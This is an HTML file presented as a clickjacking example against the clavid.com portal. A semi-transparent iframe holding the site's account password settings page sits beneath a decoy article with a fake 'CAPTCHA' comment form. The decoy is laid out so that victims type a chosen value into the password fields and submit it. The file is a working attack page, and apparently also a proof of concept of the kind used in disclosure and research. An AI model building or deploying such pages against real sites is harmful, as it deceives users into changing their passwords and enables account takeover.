<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Clickjacking example (clavid)</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <style>
            iframe {
                position: absolute;
                width: 600px;
                height: 440px;
                border: 0;
                opacity: .3;
                z-index: 1;
            }

            div#text {
                width: 525px;
            }
            fieldset#commentForm {
                position: absolute;
                top: 250px;
                width: 525px;
                height: 150px;
                background-image: url(../img/captcha.gif);
                background-repeat: no-repeat;
                background-position: right;
            }
            fieldset#commentForm p {
                margin-top: 0;
                width: 25%;
                padding-right: 1em;
                border-right: 1px dashed #CCC;
            }
            fieldset#commentForm div#captcha {
                position: absolute;
                top: 4px;
                right: 10px;
            }
            fieldset#commentForm div#captcha input {
                width: 110px;
                height: 10px;
            }
            fieldset#commentForm div#captcha input.confirm {
                margin-left: 18px;
            }
            fieldset#commentForm div#button {
                position: absolute;
                bottom: 40px;
                right: 20px;
            }
            fieldset#commentForm div#button input {
                width: 110px;
                height: 20px;
            }
        </style>
    </head>
    <body>
        <iframe src="https://www.clavid.com/portal/accountPasswordSettings.jsf"></iframe>
        <div id="text">
            <h3>Article Title</h3>
            Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do
            eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim
            ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut
            aliquip ex ea commodo consequat. Duis aute irure dolor in
            reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla
            pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
            culpa qui officia deserunt mollit anim id est laborum.
        </div>
        <fieldset id="commentForm">
            <legend>Comment</legend>
            <p>
                To give a comment on this article, first type in the value of
                the CAPTCHA characters.
            </p>
            <div id="captcha">
                CAPTCHA value: <input type="text" /><br />
                Confirm value: <input type="text" class="confirm" /><br />
            </div>
            <div id="button">
                <input type="submit" value="Continue" />
            </div>
        </fieldset>
    </body>
</html>
